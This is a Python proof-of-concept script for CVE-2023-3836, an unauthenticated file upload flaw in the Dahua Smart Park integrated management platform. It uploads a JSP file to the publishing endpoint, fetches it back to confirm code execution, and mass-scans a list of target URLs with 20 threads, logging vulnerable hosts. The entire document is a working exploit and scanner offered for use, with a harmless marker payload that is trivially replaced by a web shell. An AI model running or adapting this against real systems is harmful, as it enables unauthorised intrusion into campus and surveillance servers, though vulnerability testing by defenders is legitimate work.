import argparse
import textwrap

import requests
import json
requests.packages.urllib3.disable_warnings()
from multiprocessing.dummy import Pool
from rich.console import Console
console = Console()

text = """



 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗  █████╗ ██████╗  ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗██╔══██╗╚════██╗██╔════╝ 
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝╚█████╔╝ █████╔╝███████╗ 
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔══██╗ ╚═══██╗██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝╚█████╔╝██████╔╝╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝  ╚════╝ ╚═════╝  ╚═════╝ 
                                                                                                    

                                                                                                     @version:1.0.0
                                                                                                     @author:zt-byte        

    """


def current(text):
    console.print(f"[+]{text} 存在漏洞", style="bold green")
def no_current(text):
    console.print(f"[+]{text} 存在漏洞", style="bold yellow")
def ban(text):
    console.print(text, style="bold blue")


headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15", "Content-Type": "multipart/form-data; boundary=dd8f988919484abab3816881c55272a7", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
data = "--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"0EaE10E7dF5F10C2.jsp\"\r\n\r\n<%out.println(\"vultest\");%>\r\n--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"poc\"\r\n\r\npoc\r\n--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"Submit\"\r\n\r\nsubmit\r\n--dd8f988919484abab3816881c55272a7--"

def poc(url):
    url_end = url + "/publishing/publishing/material/file/video"

    try:
        response = requests.post(url_end, headers=headers, data=data, verify=False,timeout=4)
        dict = json.loads(response.text)
        path = dict["data"]["path"]
        url = url+"/publishingImg/"+path
        text = requests.get(url,verify = False).text
        if "vultest" in text:
            with open("result.txt","a",encoding="utf-8") as file:
                file.write(url+"\n")
            current(url_end)
        else:
            print(f"{url}不存在漏洞")

    except:
        pass


def op(file):
    list = []
    with open(f"{file}","r",encoding="utf-8") as f:
        urls = f.readlines()
        for url in urls:
            url = url.strip()
            list.append(url)
    return  list



if __name__ == '__main__':
    ban(text)
    parser = argparse.ArgumentParser(description='大华智慧园区综合管理平台publishing文件上传poc',
                                     formatter_class=argparse.RawDescriptionHelpFormatter,
                                     epilog=textwrap.dedent(
                                         '''example:  python CVE-2023-3836.py -f ip.txt'''))
    parser.add_argument("-f", "--file", dest="file", type=str, help="要查询的url文件，example:urls.txt")

    args = parser.parse_args()
    list = op(args.file)

    mp = Pool(20)  # 20自己指定的线程数
    mp.map(poc, list)  # printNumber 函数 target 目标列表
    mp.close()
    mp.join()